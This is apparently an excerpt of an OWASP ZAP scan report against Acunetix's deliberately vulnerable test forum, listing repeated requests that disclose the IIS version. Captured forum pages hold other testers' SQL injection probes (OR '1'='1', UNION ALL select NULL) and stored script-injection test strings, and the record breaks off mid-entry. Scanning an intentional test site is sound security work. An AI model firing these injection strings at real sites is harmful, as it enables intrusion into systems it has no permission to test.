POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 505 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 13536 |
| Response Body - size: 13,536 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 4913 |
| Response Body - size: 4,913 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
